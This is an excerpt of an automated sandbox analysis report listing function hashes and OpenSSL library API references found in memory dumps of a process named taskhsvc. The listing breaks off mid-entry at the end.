                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Digest$__stack_chk_fail$Final_exInit_exN1_item_i2dP_md5UpdateX509_X_cleanupX_clear_flagsX_initX_set_flagsi2d_
                                                            • String ID:
                                                            • API String ID: 2267062919-0
                                                            • Opcode ID: 3959ce6b758f40c34a83658d0098fa79e45980063524c8b4fce133464dc5a0b9
                                                            • Instruction ID: 5762cce9bf0e0dceff992b17d0757d666da14fe2f9c40b2e2ee950313586b633
                                                            • Opcode Fuzzy Hash: 3959ce6b758f40c34a83658d0098fa79e45980063524c8b4fce133464dc5a0b9
                                                            • Instruction Fuzzy Hash: E20119B41187109FC740EF24D58064FBBF0BF48798F02981DE4898B740D775E848CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: r${
                                                            • API String ID: 1767461275-2651532350
                                                            • Opcode ID: 54ac6bd364c49f65579eab31614fca481b7a692d3580023716370935f62411d1
                                                            • Instruction ID: 833a79ce3198ba8710a241e455ad89506a8b0f1674f68602dc57b57b172c07be
                                                            • Opcode Fuzzy Hash: 54ac6bd364c49f65579eab31614fca481b7a692d3580023716370935f62411d1
                                                            • Instruction Fuzzy Hash: 5961AEB161D7409FD350CF68C48035BBBE2AB89344F55992DF4E88B711D37AD4098B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: n$p
                                                            • API String ID: 1767461275-484814754
                                                            • Opcode ID: 34fccb6541ca9adcbb67509f30f6bce87c95b697bdfdeb3b09824115c5249272
                                                            • Instruction ID: cd769e05413a399771a7eb6c525e275cb102a83f429dbf9e648035c6336e3bef
                                                            • Opcode Fuzzy Hash: 34fccb6541ca9adcbb67509f30f6bce87c95b697bdfdeb3b09824115c5249272
                                                            • Instruction Fuzzy Hash: AC419B711087428FD7108F68844435BBBF1BB82368F75A71AD5E45F7A0CB71950B8B8A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_parse_listV3_get_sectionX509sk_new_null
                                                            • String ID: ,$1
                                                            • API String ID: 4000217896-1847625482
                                                            • Opcode ID: 88faf7ad61440e611ee11306565767bbb84dfb2ad61816068a62e0e575f8e91b
                                                            • Instruction ID: 06d716b33f4951b460311756bdb85d2277d72d62faf64a68e676f4b6de932056
                                                            • Opcode Fuzzy Hash: 88faf7ad61440e611ee11306565767bbb84dfb2ad61816068a62e0e575f8e91b
                                                            • Instruction Fuzzy Hash: F7213C712093428BE7208FE9C58474BFBE5AB89358F218E2CE49487790D77AC944CB56
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C
                                                            • API String ID: 1767461275-1037565863
                                                            • Opcode ID: 57bf2d5b691d1ce22b7160fc6464e66b045750eee2a1741af383bd12f479a283
                                                            • Instruction ID: e3bd38e60c2e697789e6d4d44e5c2711c750b389bc81bf852b17150b7a7c1e2a
                                                            • Opcode Fuzzy Hash: 57bf2d5b691d1ce22b7160fc6464e66b045750eee2a1741af383bd12f479a283
                                                            • Instruction Fuzzy Hash: B6215975509711AFDB10DF26C640A4BBBF5AFCA348F12AD1CE9A897700D330E9058BD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ERR_put_error.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF76EAE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$m
                                                            • API String ID: 1767461275-1333139144
                                                            • Opcode ID: 95f47a41ea7d65aa2d9a5775bf63b45ae2045b099782841562362f9d7fa74d9b
                                                            • Instruction ID: 8209b0043a75ee3275e7de4ecaac5a6fdc331f4aaf2efefb5719dc09177b6736
                                                            • Opcode Fuzzy Hash: 95f47a41ea7d65aa2d9a5775bf63b45ae2045b099782841562362f9d7fa74d9b
                                                            • Instruction Fuzzy Hash: DA2103759087009BCB20DF25D14460BBBF1BB8A368F129A0DF9A05B390C775E904CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_bsearch_sk_findsk_value
                                                            • String ID: (
                                                            • API String ID: 1331226617-3887548279
                                                            • Opcode ID: f82e2716ebf4d5313ffd0b0fcf72bb4bbfe2ba4659693370bc0b82681ee6839f
                                                            • Instruction ID: f528e3f3c487a67ed8cd79b7528df7a57dcb8d8f8fa2d910bfe20b0786d952c4
                                                            • Opcode Fuzzy Hash: f82e2716ebf4d5313ffd0b0fcf72bb4bbfe2ba4659693370bc0b82681ee6839f
                                                            • Instruction Fuzzy Hash: E3112971A09301CFD741CF28C580B5BFBF4AF85308F21891CE9A69B710E779E9458B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail$N1_item_d2iR_put_error
                                                            • String ID: n
                                                            • API String ID: 1261462335-2013832146
                                                            • Opcode ID: 248dae32a163957866d4d022ec4b580b405b4d9f4a2fccf9f68833790b25c7a9
                                                            • Instruction ID: 75658d03841950fb874c2b939cc998c9203003ca512e2851a20e4c1fa92a43db
                                                            • Opcode Fuzzy Hash: 248dae32a163957866d4d022ec4b580b405b4d9f4a2fccf9f68833790b25c7a9
                                                            • Instruction Fuzzy Hash: D41128706083009FD700DF25C18060BBBF0BB88318F91D91DE5A88B710E774E9088F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Init
                                                            • String ID:
                                                            • API String ID: 1715882826-0
                                                            • Opcode ID: e5bccdfd2fce094b48d2b510736529b240e2286bf41987285a61737ca95deca2
                                                            • Instruction ID: dfd73239a26c737031324e16d63fabe8fce88d91afe6a5311bc6675d9453d0e7
                                                            • Opcode Fuzzy Hash: e5bccdfd2fce094b48d2b510736529b240e2286bf41987285a61737ca95deca2
                                                            • Instruction Fuzzy Hash: 4F01E4B1608B209BC700AF26C98455FBBF4AF85658F22AC2DE99847700D731E905CBD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Init
                                                            • String ID:
                                                            • API String ID: 1715882826-0
                                                            • Opcode ID: 866d147eb1dbc2273ab3b82b703b3816536f8eade7a89ec3bcf5450114869591
                                                            • Instruction ID: abe4db68a237994ad238973fae57fb51ecb5e0777f0bdefc108e7aa6d5d98ba6
                                                            • Opcode Fuzzy Hash: 866d147eb1dbc2273ab3b82b703b3816536f8eade7a89ec3bcf5450114869591
                                                            • Instruction Fuzzy Hash: BA0146B56097108BD710AF25C980A4FFBF4EF88648F218C2DE69887710C739E906CB97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • sk_num.LIBEAY32 ref: 6CE263CF
                                                            • ERR_put_error.LIBEAY32 ref: 6CE26426
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2643D
                                                            • sk_set.LIBEAY32 ref: 6CE264B1
                                                            • sk_new_null.LIBEAY32 ref: 6CE264CE
                                                              • Part of subcall function 6CED2FB0: CRYPTO_malloc.LIBEAY32 ref: 6CED2FD6
                                                              • Part of subcall function 6CED2FB0: CRYPTO_malloc.LIBEAY32 ref: 6CED2FFC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$O_freeR_get_stateR_put_errorsk_new_nullsk_numsk_set
                                                            • String ID: A$f
                                                            • API String ID: 3131146646-3676314414
                                                            • Opcode ID: 1aaf8979e680a53ca387a7b308fac3198004d7c11e5c91d309b26be012141735
                                                            • Instruction ID: e02b6bc6693d8a4fdb63f6a4d8dfeffcbdf067ddfd69b96a98f1629cb1d463e8
                                                            • Opcode Fuzzy Hash: 1aaf8979e680a53ca387a7b308fac3198004d7c11e5c91d309b26be012141735
                                                            • Instruction Fuzzy Hash: 0BF0F4B11083028BD7009F69D04434AB7F4FB8435CF265A2DE9D89BB50D77AA9498B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$f$i
                                                            • API String ID: 0-87896389
                                                            • Opcode ID: 7eabd92602414e01ed863c5381110d2cac8d02dba93307dca34622a21fd6e916
                                                            • Instruction ID: 89453c8782bf71b429b02662461f89c0ac8179518a38c3c5154c2c8b004ff97e
                                                            • Opcode Fuzzy Hash: 7eabd92602414e01ed863c5381110d2cac8d02dba93307dca34622a21fd6e916
                                                            • Instruction Fuzzy Hash: FAF06DB15097028BE300AF66C54061BBFF5AFC0788F12D91CACA40B741D7B6C8098BA3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa0c90fa7c2d99c3c31ee106c6ae4db70aead0c156c64142a0152a75b3192da9
                                                            • Instruction ID: 12f614aad8331df3d56a015c8e59f55025876ec234fd639c7b7f6fddbd3df31c
                                                            • Opcode Fuzzy Hash: aa0c90fa7c2d99c3c31ee106c6ae4db70aead0c156c64142a0152a75b3192da9
                                                            • Instruction Fuzzy Hash: 8541C9756097018FD720CF29D18091ABBF0FF89758F25896EE9A88B750D730E801CF62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2987856527-0
                                                            • Opcode ID: 70f68c22721937474e28e5028908ade63f4d7fc4f22fca3126c1e593a43f887b
                                                            • Instruction ID: e697082c2884dff1725c34a8f98ac3f79f49d4b67c30be7d0cf7e5fe8cde7e1e
                                                            • Opcode Fuzzy Hash: 70f68c22721937474e28e5028908ade63f4d7fc4f22fca3126c1e593a43f887b
                                                            • Instruction Fuzzy Hash: 93314D717086408FC710DF29C68165BB7F2BB8A32CF65892EE669CB740D631E941CB97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$lh_retrievesk_delete_ptrsk_push
                                                            • String ID:
                                                            • API String ID: 2370585614-0
                                                            • Opcode ID: ec31e94765ca894aed57176d6a441634471a05e38dd5ac174d8522a3d30d83d6
                                                            • Instruction ID: d473cb977cbb9b25b90399b37dad7e59ddd614937df384b64d4dee31b7bc4ab3
                                                            • Opcode Fuzzy Hash: ec31e94765ca894aed57176d6a441634471a05e38dd5ac174d8522a3d30d83d6
                                                            • Instruction Fuzzy Hash: 224129B16087418FEB00DF25C64235BBBF0ABC5308F51991DE9A86B710D775E6498F83
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: a7dc5f24d82a8219f962144650ca792988ef251bb83b2d638464c47edfc60f58
                                                            • Instruction ID: ac0bf776cc636aa352d0aa228bfc102330023673ee1b30c504f7aaa7410aec4b
                                                            • Opcode Fuzzy Hash: a7dc5f24d82a8219f962144650ca792988ef251bb83b2d638464c47edfc60f58
                                                            • Instruction Fuzzy Hash: 47313D316086008FDB04DF29C24165BB7F1FB89318F46CA5DE599AB701D738BA05CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: eef3a5873d0132ebc94f963609077da701ab21314e4ffae01c7a5b55919e388e
                                                            • Instruction ID: 1561e4706594a98a2351ae827128391c0640095ffaa39bca76a5ed2f82bb9bd7
                                                            • Opcode Fuzzy Hash: eef3a5873d0132ebc94f963609077da701ab21314e4ffae01c7a5b55919e388e
                                                            • Instruction Fuzzy Hash: 0D3121759046409FCB10EF29C74151BB7F1BB89318F96C95CEA689B701E335FA048F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 762adea00b829f6c52f69a4b08a5f79f0f29cf8ced6ae77853aa97d8c99648d2
                                                            • Instruction ID: 82dae0b7d9e5313fb9b2f21143878034208066b27111b86eab2aacbd083938ad
                                                            • Opcode Fuzzy Hash: 762adea00b829f6c52f69a4b08a5f79f0f29cf8ced6ae77853aa97d8c99648d2
                                                            • Instruction Fuzzy Hash: 27213071A189009FCB10EF3DC64165BB7F1AB85318F86995CF664CB705E235EA048BC6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: lh_doalllh_freesk_pop_free
                                                            • String ID:
                                                            • API String ID: 459119117-0
                                                            • Opcode ID: a34d6b43e173da256fc37e20c5941d5b290958e1fc12db88901b18733e08fea0
                                                            • Instruction ID: 6f308bd1b7ad5c8bfdfa3440d0b305f1c7d9dd79af73bd8bb9d4612118875a02
                                                            • Opcode Fuzzy Hash: a34d6b43e173da256fc37e20c5941d5b290958e1fc12db88901b18733e08fea0
                                                            • Instruction Fuzzy Hash: CF211A76A147008FCB10DF28D684B0ABBF4FB09318F16895EE5A88B710D334E948CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF65014
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF65024
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF65054
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_obj2nid$__stack_chk_faillh_retrieve
                                                            • String ID:
                                                            • API String ID: 2302522118-0
                                                            • Opcode ID: fd730b027c826fcd6187a370d4bded4d5c55f8c956cb5791f4edce5f9f4f627e
                                                            • Instruction ID: eabda02f0228bfb8cf61be10114b93e9af2baf1841d956da6900a7f4ff38567f
                                                            • Opcode Fuzzy Hash: fd730b027c826fcd6187a370d4bded4d5c55f8c956cb5791f4edce5f9f4f627e
                                                            • Instruction Fuzzy Hash: EF212C356097029BDF14DF66C280A5BB7F0BB48308F51491CEAA5ABB05C731E9048FE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_value$sk_num$sk_delete
                                                            • String ID:
                                                            • API String ID: 3125562421-0
                                                            • Opcode ID: edb3fab86ea713e579596805dd3f32c692df2f7f8515e036dda0f47e74107ce9
                                                            • Instruction ID: d83885f0174351a0c21af842f412363b8c754dce5d89d71b2957e94e248c9ec0
                                                            • Opcode Fuzzy Hash: edb3fab86ea713e579596805dd3f32c692df2f7f8515e036dda0f47e74107ce9
                                                            • Instruction Fuzzy Hash: E2211475509724AFC712EF24D58064EBBF0EF84354F16AA1DE8A887711D730E98ACBC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CE3EED7
                                                            • EVP_MD_CTX_copy_ex.LIBEAY32 ref: 6CE3EF0A
                                                            • EVP_DigestUpdate.LIBEAY32 ref: 6CE3EF22
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CE3EF3A
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Digest$Final_ex$UpdateX_copy_ex
                                                            • String ID:
                                                            • API String ID: 2597599371-0
                                                            • Opcode ID: 3cb2d61e6d10c520e76f39a300d407c7db8304a2508149a3c4107b2cce91a454
                                                            • Instruction ID: 4eef2b038e9988961ae8dfec69566e1524d1eb6a4ac66b9c2873d28239fcd7d2
                                                            • Opcode Fuzzy Hash: 3cb2d61e6d10c520e76f39a300d407c7db8304a2508149a3c4107b2cce91a454
                                                            • Instruction Fuzzy Hash: F611F6755097019FD710DF2AC98065ABBF4AF88298F219C2EE99CC3740E730E945CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 6CF94FA9
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CE21439), ref: 6CF94FBA
                                                            • GetCurrentThreadId.KERNEL32 ref: 6CF94FC2
                                                            • GetTickCount.KERNEL32 ref: 6CF94FCA
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CE21439), ref: 6CF94FD9
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                            • String ID:
                                                            • API String ID: 1445889803-0
                                                            • Opcode ID: db85835321c22fa8d02b0aeb01af5cc1d399b75e9be41292b7adf61a6a49d48a
                                                            • Instruction ID: 6dd6279e30d0c35656d7f6922c8c0128d5e6cbbe3a67d1ea483658490f7296a8
                                                            • Opcode Fuzzy Hash: db85835321c22fa8d02b0aeb01af5cc1d399b75e9be41292b7adf61a6a49d48a
                                                            • Instruction Fuzzy Hash: 5C118676A083418FDF10EFB9D88865BBBF4FB89259F410939E555C7200DB369448CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 249d0b270eb90fe4f91fd1035d2c5f6c62c43a8f91b5397aabd7d9f7c07d5fe0
                                                            • Instruction ID: 3e73c6bddacf7e77236bc078d718c95307a766afbd7b3b983fbfeb97c17472ca
                                                            • Opcode Fuzzy Hash: 249d0b270eb90fe4f91fd1035d2c5f6c62c43a8f91b5397aabd7d9f7c07d5fe0
                                                            • Instruction Fuzzy Hash: 46110D31504A409FDB20EF79C64074BB7F1AB8A318F07DA1CD678DB204D230B9068FAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • s2i_ASN1_INTEGER.LIBEAY32 ref: 6CF54535
                                                              • Part of subcall function 6CF4CFD0: BN_new.LIBEAY32 ref: 6CF4CFF4
                                                            • ERR_put_error.LIBEAY32 ref: 6CF545DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_newR_put_errors2i_
                                                            • String ID: @$A$A$}$~
                                                            • API String ID: 3657660440-1801014758
                                                            • Opcode ID: eeb50cf70d4195eb7246e60c8fa9722bf6b4cf5de55f70b145e825c83e0b9cf7
                                                            • Instruction ID: 30df74b1d81726bd93d3e87d79ebe9c191faa78def348899a3d22138e9183719
                                                            • Opcode Fuzzy Hash: eeb50cf70d4195eb7246e60c8fa9722bf6b4cf5de55f70b145e825c83e0b9cf7
                                                            • Instruction Fuzzy Hash: D1012D756093008FC700DFB9D58055BBBF4AF89348F52892DEA98C7B04E774E815CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 314559513-0
                                                            • Opcode ID: 12f96066614700743eec4a672ae343f3a5ecf5120dffbaaec2d5113c89435767
                                                            • Instruction ID: 8f4a46e4382fb42a9458c3eb8ee92fb19df4e24ab6ecbe954c521a975d51006e
                                                            • Opcode Fuzzy Hash: 12f96066614700743eec4a672ae343f3a5ecf5120dffbaaec2d5113c89435767
                                                            • Instruction Fuzzy Hash: BE1198756197019FCB40DF39C68165FBBF1AB89718F42991CF5A8CB704D230E9498F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • BN_CTX_start.LIBEAY32 ref: 6CE7CD55
                                                            • BN_CTX_get.LIBEAY32 ref: 6CE7CD5D
                                                            • BN_copy.LIBEAY32 ref: 6CE7CD71
                                                            • BN_CTX_end.LIBEAY32 ref: 6CE7CD8E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CE7CDB4
                                                              • Part of subcall function 6CE7C790: bn_mul_add_words.LIBEAY32 ref: 6CE7C8EE
                                                              • Part of subcall function 6CE7C790: bn_sub_words.LIBEAY32 ref: 6CE7C961
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_copyX_endX_getX_start__stack_chk_failbn_mul_add_wordsbn_sub_words
                                                            • String ID:
                                                            • API String ID: 1182659954-0
                                                            • Opcode ID: 526239b30998d9b32064e6534f48c58bd1b4cee58b76275559bd2760f8f43f7c
                                                            • Instruction ID: a98a9437369dfaad3c32b1ae95a5c7aa48e549ad1e33b3da43309322bc358ae1
                                                            • Opcode Fuzzy Hash: 526239b30998d9b32064e6534f48c58bd1b4cee58b76275559bd2760f8f43f7c
                                                            • Instruction Fuzzy Hash: 1801D7716187108FC710EF79C98055FBBF8AB88358F11582EEA9587700D734E909CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ASN1_item_i2d.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF08635), ref: 6CF08915
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,6CF08635), ref: 6CF0892A
                                                            • ASN1_item_new.LIBEAY32 ref: 6CF08945
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1700296266-0
                                                            • Opcode ID: 1df3c2e7800453c07710e29e36edffd70108f239284b22edd4524568e03fe351
                                                            • Instruction ID: 563f5789aea4b0ceebac29fcafd330a120dfb995f644ea71d5f34129024301c0
                                                            • Opcode Fuzzy Hash: 1df3c2e7800453c07710e29e36edffd70108f239284b22edd4524568e03fe351
